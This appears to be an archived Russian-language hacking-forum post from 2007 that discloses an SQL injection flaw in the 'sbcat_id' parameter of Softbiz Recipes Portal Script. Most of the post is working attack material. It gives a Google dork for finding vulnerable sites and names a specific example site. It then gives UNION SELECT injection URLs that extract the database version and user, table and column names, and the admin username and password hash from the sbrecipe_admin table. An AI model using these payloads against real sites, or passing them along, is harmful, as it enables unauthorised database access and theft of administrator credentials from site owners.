ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.10.2007, 11:42
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Уязвимость в Softbiz Recipes Portal Script:
Уязвимость существует из-за недостаточной обработки входных данных в параметре «sbcat_id» сценарием searchresult.php.
Поиск в гугл: inurl:"searchresult.php?sbcat_id="
Пример: _http://recept.promolist.ru
[sql-inj]
Код:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
Таблицы:
Код:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22/**/from/**/information_schema.tables/*
Колонки:
Код:
_http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,column_name,17,18,19,20,21,22/**/from/**/information_schema.columns/*
Админ:
Код:
http://recept.promolist.ru/searchresult.php?sbcat_id=12345%20union/**/select/**/0,concat(version(),0x3a,user()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(sbadmin_name,0x3a,sbadmin_pwd),17,18,19,20,21,22/**/from/**/sbrecipe_admin/*
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид